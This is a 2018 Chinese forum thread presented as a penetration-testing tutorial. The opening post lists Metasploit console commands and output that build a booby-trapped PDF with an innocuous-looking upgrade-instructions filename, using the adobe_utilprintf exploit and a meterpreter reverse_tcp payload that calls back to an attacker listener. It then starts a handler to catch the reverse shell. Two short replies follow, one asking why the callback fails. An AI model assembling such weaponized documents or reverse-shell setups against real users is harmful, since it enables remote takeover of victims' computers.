admin 发表于 2018-7-2 18:47:01

msfconsole生成pdf 渗透测试

一:生成pdf木马

msf > use exploit/windows/fileformat/adobe_utilprintf
msf exploit(adobe_utilprintf) > set FILENAME BestComputers-UpgradeInstructions.pdf
FILENAME => BestComputers-UpgradeInstructions.pdf
msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_utilprintf) > set LHOST 192.168.8.128
LHOST => 192.168.8.128
msf exploit(adobe_utilprintf) > set LPORT 4455
LPORT => 4455
msf exploit(adobe_utilprintf) > show options

Module options (exploit/windows/fileformat/adobe_utilprintf):

   Name      Current Setting                        RequiredDescription
   ----      ---------------                        -------------------
   FILENAMEBestComputers-UpgradeInstructions.pdfyes       The file name.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current SettingRequiredDescription
   ----      ----------------------------------
   EXITFUNCprocess          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST   192.168.8.128    yes       The listen address
   LPORT   4455             yes       The listen port


Exploit target:

   IdName
   ------
   0   Adobe Reader v8.1.2 (Windows XP SP3 English)


二:开始攻击

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 4455
LPORT => 4455
msf exploit(handler) > set LHOST 192.168.8.128
LHOST => 192.168.8.128
msf exploit(handler) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...





libo 发表于 2018-7-2 21:13:56

666
{:9048:}

priess1314 发表于 2018-7-3 08:32:34

楼主,我生成后运行pdf文档,得不到反弹!怎么回事?{:9012:}{:9012:}{:9012:}
页: [1]
查看完整版本: msfconsole生成pdf 渗透测试